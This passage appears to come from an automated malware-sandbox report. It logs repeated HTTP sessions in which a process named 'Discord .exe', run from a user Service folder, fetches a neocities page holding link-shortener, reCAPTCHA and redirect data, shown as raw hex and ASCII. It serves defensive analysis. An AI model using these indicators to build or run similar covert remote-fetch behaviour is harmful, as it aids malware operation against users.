4a 56 30 31 50 62 6c 6c 55 4d 6d 39 4c 4f 55 39 52 51 6c 6c 4a 61 47 5a 49 64 6d Data Ascii: e6LcEr_UUAAAAAHXt5wx-k9P_m8Z1JY-Ck9Mxrhxo___grecaptcha_cfg.clients['0']['W']['W']['callback']server-520https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbVJTRmNBVFJYOFJZNXQyQThnQzByWHAwRVFPQXxBQ3Jtc0tudXFBTV9JV01PbllUMm9LOU9RQllJaGZIdm
2022-11-04 19:00:04 UTC	484	IN	Data Raw: 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 6d 39 78 57 57 38 34 4e 58 6c 77 65 6b 78 59 56 7a 4a 57 4e 45 63 7a 59 6d 49 30 56 6b 70 54 63 57 68 52 51 58 78 42 51 33 4a 74 63 30 74 75 63 47 35 4f 51 6e 4d 78 56 57 4a 55 58 32 52 4c 61 58 70 78 55 6a 46 78 61 6c 41 32 56 57 52 4a 61 55 35 70 4e 30 74 74 5a 6e 68 56 57 6a 4e 5a 53 55 5a 6e 51 6c 49 32 55 58 4d 30 63 57 68 35 65 46 56 43 65 6d 39 58 56 55 46 6e 5a 32 64 74 54 55 4e 57 61 44 4a 4f 65 45 52 77 51 56 70 4c 63 7a 68 4b 52 6d 39 43 54 56 6f 79 63 32 74 4d 62 6b 31 52 52 30 78 46 4e 57 63 7a 4f 57 68 48 4e 6d 74 68 57 46 46 4b 62 57 45 77 54 32 31 4c 4d 6d 70 36 56 51 26 71 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6f 75 6f 2e 69 6f 25 32 46 57 64 72 32 Data Ascii: event=&redir_token=QUFFLUhqbm9xWW84NXlwekxYVzJWNEczYmI0VkpTcWhRQXxBQ3Jtc0tucG5OQnMxVWJUX2RLaXpxUjFxalA2VWRJaU5pN0ttZnhVWjNZSUZnQlI2UXM0cWh5eFVCem9XVUFnZ2dtTUNWaDJOeERwQVpLczhKRm9CTVoyc2tMbk1RR0xFNWczOWhHNmthWFFKbWEwT21LMmp6VQ&q=https%3A%2F%2Fouo.io%2FWdr2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.7	49744	198.51.233.2	443	C:\Users\user\Service\Discord .exe

Timestamp	kBytes transferred	Direction	Data
2022-11-04 19:00:04 UTC	490	OUT	GET / HTTP/1.1 Host: c1-wi.neocities.org Connection: close
2022-11-04 19:00:04 UTC	490	IN	HTTP/1.1 200 OK Date: Fri, 04 Nov 2022 19:00:04 GMT Content-Type: text/html Content-Length: 38000 Connection: close Vary: Accept-Encoding Last-Modified: Fri, 04 Nov 2022 18:41:15 GMT ETag: "63655ccb-9470" Server: neocities X-Ipfs-Path: /ipns/c1-wi.neocities.org Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: * X-Neocities-CDN: cdn-fra Upgrade-Insecure-Requests: 1 X-Cached: HIT Accept-Ranges: bytes
2022-11-04 19:00:04 UTC	490	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 20 0d 0a 31 35 30 0d 0a 32 34 30 0d 0a 59 6f 75 54 75 62 65 0d 0a 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 4c 69 6e 6b 76 65 72 74 69 73 65 0d 0a 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 6f 75 6f 2e 69 6f 0d 0a 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 Data Ascii: <html><head><title> 150240YouTube2222220000000000000000000111152222220000000000000000000111150010Linkvertise1111110000000000000000000111151111110000000000000000000111150010ouo.io000000000000000000000000011115000000000000000000000000011
2022-11-04 19:00:04 UTC	506	IN	Data Raw: 65 0d 0a 36 4c 63 45 72 5f 55 55 41 41 41 41 41 48 58 74 35 77 78 2d 6b 39 50 5f 6d 38 5a 31 4a 59 2d 43 6b 39 4d 78 72 68 78 6f 0d 0a 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 2e 63 6c 69 65 6e 74 73 5b 27 30 27 5d 5b 27 57 27 5d 5b 27 57 27 5d 5b 27 63 61 6c 6c 62 61 63 6b 27 5d 0d 0a 73 65 72 76 65 72 2d 35 0d 0a 32 30 0d 0a 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 72 65 64 69 72 65 63 74 3f 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 56 4a 54 52 6d 4e 42 56 46 4a 59 4f 46 4a 5a 4e 58 51 79 51 54 68 6e 51 7a 42 79 57 48 41 77 52 56 46 50 51 58 78 42 51 33 4a 74 63 30 74 75 64 58 46 42 54 56 39 4a 56 30 31 50 62 6c 6c 55 4d 6d 39 4c 4f 55 39 52 51 6c 6c 4a 61 47 5a 49 64 6d Data Ascii: e6LcEr_UUAAAAAHXt5wx-k9P_m8Z1JY-Ck9Mxrhxo___grecaptcha_cfg.clients['0']['W']['W']['callback']server-520https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbVJTRmNBVFJYOFJZNXQyQThnQzByWHAwRVFPQXxBQ3Jtc0tudXFBTV9JV01PbllUMm9LOU9RQllJaGZIdm
2022-11-04 19:00:04 UTC	522	IN	Data Raw: 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 6d 39 78 57 57 38 34 4e 58 6c 77 65 6b 78 59 56 7a 4a 57 4e 45 63 7a 59 6d 49 30 56 6b 70 54 63 57 68 52 51 58 78 42 51 33 4a 74 63 30 74 75 63 47 35 4f 51 6e 4d 78 56 57 4a 55 58 32 52 4c 61 58 70 78 55 6a 46 78 61 6c 41 32 56 57 52 4a 61 55 35 70 4e 30 74 74 5a 6e 68 56 57 6a 4e 5a 53 55 5a 6e 51 6c 49 32 55 58 4d 30 63 57 68 35 65 46 56 43 65 6d 39 58 56 55 46 6e 5a 32 64 74 54 55 4e 57 61 44 4a 4f 65 45 52 77 51 56 70 4c 63 7a 68 4b 52 6d 39 43 54 56 6f 79 63 32 74 4d 62 6b 31 52 52 30 78 46 4e 57 63 7a 4f 57 68 48 4e 6d 74 68 57 46 46 4b 62 57 45 77 54 32 31 4c 4d 6d 70 36 56 51 26 71 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6f 75 6f 2e 69 6f 25 32 46 57 64 72 32 Data Ascii: event=&redir_token=QUFFLUhqbm9xWW84NXlwekxYVzJWNEczYmI0VkpTcWhRQXxBQ3Jtc0tucG5OQnMxVWJUX2RLaXpxUjFxalA2VWRJaU5pN0ttZnhVWjNZSUZnQlI2UXM0cWh5eFVCem9XVUFnZ2dtTUNWaDJOeERwQVpLczhKRm9CTVoyc2tMbk1RR0xFNWczOWhHNmthWFFKbWEwT21LMmp6VQ&q=https%3A%2F%2Fouo.io%2FWdr2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.7	49745	198.51.233.2	443	C:\Users\user\Service\Discord .exe

Timestamp	kBytes transferred	Direction	Data
2022-11-04 19:00:04 UTC	528	OUT	GET / HTTP/1.1 Host: c1-wi.neocities.org Connection: close
2022-11-04 19:00:04 UTC	528	IN	HTTP/1.1 200 OK Date: Fri, 04 Nov 2022 19:00:04 GMT Content-Type: text/html Content-Length: 38000 Connection: close Vary: Accept-Encoding Last-Modified: Fri, 04 Nov 2022 18:41:15 GMT ETag: "63655ccb-9470" Server: neocities X-Ipfs-Path: /ipns/c1-wi.neocities.org Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: * X-Neocities-CDN: cdn-fra Upgrade-Insecure-Requests: 1 X-Cached: HIT Accept-Ranges: bytes
2022-11-04 19:00:04 UTC	528	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 20 0d 0a 31 35 30 0d 0a 32 34 30 0d 0a 59 6f 75 54 75 62 65 0d 0a 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 4c 69 6e 6b 76 65 72 74 69 73 65 0d 0a 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 6f 75 6f 2e 69 6f 0d 0a 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 Data Ascii: <html><head><title> 150240YouTube2222220000000000000000000111152222220000000000000000000111150010Linkvertise1111110000000000000000000111151111110000000000000000000111150010ouo.io000000000000000000000000011115000000000000000000000000011
2022-11-04 19:00:04 UTC	544	IN	Data Raw: 65 0d 0a 36 4c 63 45 72 5f 55 55 41 41 41 41 41 48 58 74 35 77 78 2d 6b 39 50 5f 6d 38 5a 31 4a 59 2d 43 6b 39 4d 78 72 68 78 6f 0d 0a 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 2e 63 6c 69 65 6e 74 73 5b 27 30 27 5d 5b 27 57 27 5d 5b 27 57 27 5d 5b 27 63 61 6c 6c 62 61 63 6b 27 5d 0d 0a 73 65 72 76 65 72 2d 35 0d 0a 32 30 0d 0a 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 72 65 64 69 72 65 63 74 3f 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 56 4a 54 52 6d 4e 42 56 46 4a 59 4f 46 4a 5a 4e 58 51 79 51 54 68 6e 51 7a 42 79 57 48 41 77 52 56 46 50 51 58 78 42 51 33 4a 74 63 30 74 75 64 58 46 42 54 56 39 4a 56 30 31 50 62 6c 6c 55 4d 6d 39 4c 4f 55 39 52 51 6c 6c 4a 61 47 5a 49 64 6d Data Ascii: e6LcEr_UUAAAAAHXt5wx-k9P_m8Z1JY-Ck9Mxrhxo___grecaptcha_cfg.clients['0']['W']['W']['callback']server-520https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbVJTRmNBVFJYOFJZNXQyQThnQzByWHAwRVFPQXxBQ3Jtc0tudXFBTV9JV01PbllUMm9LOU9RQllJaGZIdm
2022-11-04 19:00:04 UTC	560	IN	Data Raw: 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 6d 39 78 57 57 38 34 4e 58 6c 77 65 6b 78 59 56 7a 4a 57 4e 45 63 7a 59 6d 49 30 56 6b 70 54 63 57 68 52 51 58 78 42 51 33 4a 74 63 30 74 75 63 47 35 4f 51 6e 4d 78 56 57 4a 55 58 32 52 4c 61 58 70 78 55 6a 46 78 61 6c 41 32 56 57 52 4a 61 55 35 70 4e 30 74 74 5a 6e 68 56 57 6a 4e 5a 53 55 5a 6e 51 6c 49 32 55 58 4d 30 63 57 68 35 65 46 56 43 65 6d 39 58 56 55 46 6e 5a 32 64 74 54 55 4e 57 61 44 4a 4f 65 45 52 77 51 56 70 4c 63 7a 68 4b 52 6d 39 43 54 56 6f 79 63 32 74 4d 62 6b 31 52 52 30 78 46 4e 57 63 7a 4f 57 68 48 4e 6d 74 68 57 46 46 4b 62 57 45 77 54 32 31 4c 4d 6d 70 36 56 51 26 71 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6f 75 6f 2e 69 6f 25 32 46 57 64 72 32 Data Ascii: event=&redir_token=QUFFLUhqbm9xWW84NXlwekxYVzJWNEczYmI0VkpTcWhRQXxBQ3Jtc0tucG5OQnMxVWJUX2RLaXpxUjFxalA2VWRJaU5pN0ttZnhVWjNZSUZnQlI2UXM0cWh5eFVCem9XVUFnZ2dtTUNWaDJOeERwQVpLczhKRm9CTVoyc2tMbk1RR0xFNWczOWhHNmthWFFKbWEwT21LMmp6VQ&q=https%3A%2F%2Fouo.io%2FWdr2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49733	198.51.233.2	443	C:\Users\user\Service\Discord .exe

Timestamp	kBytes transferred	Direction	Data
2022-11-04 18:59:46 UTC	75	OUT	GET / HTTP/1.1 Host: c1-wi.neocities.org Connection: close
2022-11-04 18:59:46 UTC	75	IN	HTTP/1.1 200 OK Date: Fri, 04 Nov 2022 18:59:46 GMT Content-Type: text/html Content-Length: 38000 Connection: close Vary: Accept-Encoding Last-Modified: Fri, 04 Nov 2022 18:41:15 GMT ETag: "63655ccb-9470" Server: neocities X-Ipfs-Path: /ipns/c1-wi.neocities.org Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: * X-Neocities-CDN: cdn-fra Upgrade-Insecure-Requests: 1 X-Cached: HIT Accept-Ranges: bytes
2022-11-04 18:59:46 UTC	76	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 20 0d 0a 31 35 30 0d 0a 32 34 30 0d 0a 59 6f 75 54 75 62 65 0d 0a 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 4c 69 6e 6b 76 65 72 74 69 73 65 0d 0a 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 6f 75 6f 2e 69 6f 0d 0a 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 Data Ascii: <html><head><title> 150240YouTube2222220000000000000000000111152222220000000000000000000111150010Linkvertise1111110000000000000000000111151111110000000000000000000111150010ouo.io000000000000000000000000011115000000000000000000000000011
2022-11-04 18:59:46 UTC	91	IN	Data Raw: 65 0d 0a 36 4c 63 45 72 5f 55 55 41 41 41 41 41 48 58 74 35 77 78 2d 6b 39 50 5f 6d 38 5a 31 4a 59 2d 43 6b 39 4d 78 72 68 78 6f 0d 0a 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 2e 63 6c 69 65 6e 74 73 5b 27 30 27 5d 5b 27 57 27 5d 5b 27 57 27 5d 5b 27 63 61 6c 6c 62 61 63 6b 27 5d 0d 0a 73 65 72 76 65 72 2d 35 0d 0a 32 30 0d 0a 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 72 65 64 69 72 65 63 74 3f 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 56 4a 54 52 6d 4e 42 56 46 4a 59 4f 46 4a 5a 4e 58 51 79 51 54 68 6e 51 7a 42 79 57 48 41 77 52 56 46 50 51 58 78 42 51 33 4a 74 63 30 74 75 64 58 46 42 54 56 39 4a 56 30 31 50 62 6c 6c 55 4d 6d 39 4c 4f 55 39 52 51 6c 6c 4a 61 47 5a 49 64 6d Data Ascii: e6LcEr_UUAAAAAHXt5wx-k9P_m8Z1JY-Ck9Mxrhxo___grecaptcha_cfg.clients['0']['W']['W']['callback']server-520https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbVJTRmNBVFJYOFJZNXQyQThnQzByWHAwRVFPQXxBQ3Jtc0tudXFBTV9JV01PbllUMm9LOU9RQllJaGZIdm
2022-11-04 18:59:46 UTC	107	IN	Data Raw: 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 6d 39 78 57 57 38 34 4e 58 6c 77 65 6b 78 59 56 7a 4a 57 4e 45 63 7a 59 6d 49 30 56 6b 70 54 63 57 68 52 51 58 78 42 51 33 4a 74 63 30 74 75 63 47 35 4f 51 6e 4d 78 56 57 4a 55 58 32 52 4c 61 58 70 78 55 6a 46 78 61 6c 41 32 56 57 52 4a 61 55 35 70 4e 30 74 74 5a 6e 68 56 57 6a 4e 5a 53 55 5a 6e 51 6c 49 32 55 58 4d 30 63 57 68 35 65 46 56 43 65 6d 39 58 56 55 46 6e 5a 32 64 74 54 55 4e 57 61 44 4a 4f 65 45 52 77 51 56 70 4c 63 7a 68 4b 52 6d 39 43 54 56 6f 79 63 32 74 4d 62 6b 31 52 52 30 78 46 4e 57 63 7a 4f 57 68 48 4e 6d 74 68 57 46 46 4b 62 57 45 77 54 32 31 4c 4d 6d 70 36 56 51 26 71 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6f 75 6f 2e 69 6f 25 32 46 57 64 72 32 Data Ascii: event=&redir_token=QUFFLUhqbm9xWW84NXlwekxYVzJWNEczYmI0VkpTcWhRQXxBQ3Jtc0tucG5OQnMxVWJUX2RLaXpxUjFxalA2VWRJaU5pN0ttZnhVWjNZSUZnQlI2UXM0cWh5eFVCem9XVUFnZ2dtTUNWaDJOeERwQVpLczhKRm9CTVoyc2tMbk1RR0xFNWczOWhHNmthWFFKbWEwT21LMmp6VQ&q=https%3A%2F%2Fouo.io%2FWdr2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.7	49734	198.51.233.2	443	C:\Users\user\Service\Discord .exe

Timestamp	kBytes transferred	Direction	Data
2022-11-04 18:59:46 UTC	113	OUT	GET / HTTP/1.1 Host: c1-wi.neocities.org Connection: close
2022-11-04 18:59:46 UTC	113	IN	HTTP/1.1 200 OK Date: Fri, 04 Nov 2022 18:59:46 GMT Content-Type: text/html Content-Length: 38000 Connection: close Vary: Accept-Encoding Last-Modified: Fri, 04 Nov 2022 18:41:15 GMT ETag: "63655ccb-9470" Server: neocities X-Ipfs-Path: /ipns/c1-wi.neocities.org Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: * X-Neocities-CDN: cdn-fra Upgrade-Insecure-Requests: 1 X-Cached: HIT Accept-Ranges: bytes
2022-11-04 18:59:46 UTC	113	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 20 0d 0a 31 35 30 0d 0a 32 34 30 0d 0a 59 6f 75 54 75 62 65 0d 0a 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 4c 69 6e 6b 76 65 72 74 69 73 65 0d 0a 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 6f 75 6f 2e 69 6f 0d 0a 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 Data Ascii: <html><head><title> 150240YouTube2222220000000000000000000111152222220000000000000000000111150010Linkvertise1111110000000000000000000111151111110000000000000000000111150010ouo.io000000000000000000000000011115000000000000000000000000011
2022-11-04 18:59:46 UTC	129	IN	Data Raw: 65 0d 0a 36 4c 63 45 72 5f 55 55 41 41 41 41 41 48 58 74 35 77 78 2d 6b 39 50 5f 6d 38 5a 31 4a 59 2d 43 6b 39 4d 78 72 68 78 6f 0d 0a 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 2e 63 6c 69 65 6e 74 73 5b 27 30 27 5d 5b 27 57 27 5d 5b 27 57 27 5d 5b 27 63 61 6c 6c 62 61 63 6b 27 5d 0d 0a 73 65 72 76 65 72 2d 35 0d 0a 32 30 0d 0a 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 72 65 64 69 72 65 63 74 3f 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 56 4a 54 52 6d 4e 42 56 46 4a 59 4f 46 4a 5a 4e 58 51 79 51 54 68 6e 51 7a 42 79 57 48 41 77 52 56 46 50 51 58 78 42 51 33 4a 74 63 30 74 75 64 58 46 42 54 56 39 4a 56 30 31 50 62 6c 6c 55 4d 6d 39 4c 4f 55 39 52 51 6c 6c 4a 61 47 5a 49 64 6d Data Ascii: e6LcEr_UUAAAAAHXt5wx-k9P_m8Z1JY-Ck9Mxrhxo___grecaptcha_cfg.clients['0']['W']['W']['callback']server-520https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbVJTRmNBVFJYOFJZNXQyQThnQzByWHAwRVFPQXxBQ3Jtc0tudXFBTV9JV01PbllUMm9LOU9RQllJaGZIdm
2022-11-04 18:59:46 UTC	145	IN	Data Raw: 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 6d 39 78 57 57 38 34 4e 58 6c 77 65 6b 78 59 56 7a 4a 57 4e 45 63 7a 59 6d 49 30 56 6b 70 54 63 57 68 52 51 58 78 42 51 33 4a 74 63 30 74 75 63 47 35 4f 51 6e 4d 78 56 57 4a 55 58 32 52 4c 61 58 70 78 55 6a 46 78 61 6c 41 32 56 57 52 4a 61 55 35 70 4e 30 74 74 5a 6e 68 56 57 6a 4e 5a 53 55 5a 6e 51 6c 49 32 55 58 4d 30 63 57 68 35 65 46 56 43 65 6d 39 58 56 55 46 6e 5a 32 64 74 54 55 4e 57 61 44 4a 4f 65 45 52 77 51 56 70 4c 63 7a 68 4b 52 6d 39 43 54 56 6f 79 63 32 74 4d 62 6b 31 52 52 30 78 46 4e 57 63 7a 4f 57 68 48 4e 6d 74 68 57 46 46 4b 62 57 45 77 54 32 31 4c 4d 6d 70 36 56 51 26 71 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6f 75 6f 2e 69 6f 25 32 46 57 64 72 32 Data Ascii: event=&redir_token=QUFFLUhqbm9xWW84NXlwekxYVzJWNEczYmI0VkpTcWhRQXxBQ3Jtc0tucG5OQnMxVWJUX2RLaXpxUjFxalA2VWRJaU5pN0ttZnhVWjNZSUZnQlI2UXM0cWh5eFVCem9XVUFnZ2dtTUNWaDJOeERwQVpLczhKRm9CTVoyc2tMbk1RR0xFNWczOWhHNmthWFFKbWEwT21LMmp6VQ&q=https%3A%2F%2Fouo.io%2FWdr2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.7	49735	198.51.233.2	443	C:\Users\user\Service\Discord .exe

Timestamp	kBytes transferred	Direction	Data
2022-11-04 18:59:47 UTC	150	OUT	GET / HTTP/1.1 Host: c1-wi.neocities.org Connection: close
2022-11-04 18:59:47 UTC	150	IN	HTTP/1.1 200 OK Date: Fri, 04 Nov 2022 18:59:47 GMT Content-Type: text/html Content-Length: 38000 Connection: close Vary: Accept-Encoding Last-Modified: Fri, 04 Nov 2022 18:41:15 GMT ETag: "63655ccb-9470" Server: neocities X-Ipfs-Path: /ipns/c1-wi.neocities.org Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Content-Security-Policy: upgrade-insecure-requests; default-src 'unsafe-inline' 'unsafe-eval' 'self' data: blob: * X-Neocities-CDN: cdn-fra Upgrade-Insecure-Requests: 1 X-Cached: HIT Accept-Ranges: bytes
2022-11-04 18:59:47 UTC	151	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 20 0d 0a 31 35 30 0d 0a 32 34 30 0d 0a 59 6f 75 54 75 62 65 0d 0a 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 32 32 32 32 32 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 4c 69 6e 6b 76 65 72 74 69 73 65 0d 0a 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 31 31 31 31 31 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 31 30 0d 0a 6f 75 6f 2e 69 6f 0d 0a 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 31 31 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 Data Ascii: <html><head><title> 150240YouTube2222220000000000000000000111152222220000000000000000000111150010Linkvertise1111110000000000000000000111151111110000000000000000000111150010ouo.io000000000000000000000000011115000000000000000000000000011
2022-11-04 18:59:47 UTC	166	IN	Data Raw: 65 0d 0a 36 4c 63 45 72 5f 55 55 41 41 41 41 41 48 58 74 35 77 78 2d 6b 39 50 5f 6d 38 5a 31 4a 59 2d 43 6b 39 4d 78 72 68 78 6f 0d 0a 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 2e 63 6c 69 65 6e 74 73 5b 27 30 27 5d 5b 27 57 27 5d 5b 27 57 27 5d 5b 27 63 61 6c 6c 62 61 63 6b 27 5d 0d 0a 73 65 72 76 65 72 2d 35 0d 0a 32 30 0d 0a 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 72 65 64 69 72 65 63 74 3f 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 56 4a 54 52 6d 4e 42 56 46 4a 59 4f 46 4a 5a 4e 58 51 79 51 54 68 6e 51 7a 42 79 57 48 41 77 52 56 46 50 51 58 78 42 51 33 4a 74 63 30 74 75 64 58 46 42 54 56 39 4a 56 30 31 50 62 6c 6c 55 4d 6d 39 4c 4f 55 39 52 51 6c 6c 4a 61 47 5a 49 64 6d Data Ascii: e6LcEr_UUAAAAAHXt5wx-k9P_m8Z1JY-Ck9Mxrhxo___grecaptcha_cfg.clients['0']['W']['W']['callback']server-520https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbVJTRmNBVFJYOFJZNXQyQThnQzByWHAwRVFPQXxBQ3Jtc0tudXFBTV9JV01PbllUMm9LOU9RQllJaGZIdm
2022-11-04 18:59:47 UTC	182	IN	Data Raw: 65 76 65 6e 74 3d 26 72 65 64 69 72 5f 74 6f 6b 65 6e 3d 51 55 46 46 4c 55 68 71 62 6d 39 78 57 57 38 34 4e 58 6c 77 65 6b 78 59 56 7a 4a 57 4e 45 63 7a 59 6d 49 30 56 6b 70 54 63 57 68 52 51 58 78 42 51 33 4a 74 63 30 74 75 63 47 35 4f 51 6e 4d 78 56 57 4a 55 58 32 52 4c 61 58 70 78 55 6a 46 78 61 6c 41 32 56 57 52 4a 61 55 35 70 4e 30 74 74 5a 6e 68 56 57 6a 4e 5a 53 55 5a 6e 51 6c 49 32 55 58 4d 30 63 57 68 35 65 46 56 43 65 6d 39 58 56 55 46 6e 5a 32 64 74 54 55 4e 57 61 44 4a 4f 65 45 52 77 51 56 70 4c 63 7a 68 4b 52 6d 39 43 54 56 6f 79 63 32 74 4d 62 6b 31 52 52 30 78 46 4e 57 63 7a 4f 57 68 48 4e 6d 74 68 57 46 46 4b 62 57 45 77 54 32 31 4c 4d 6d 70 36 56 51 26 71 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6f 75 6f 2e 69 6f 25 32 46 57 64 72 32 Data Ascii: 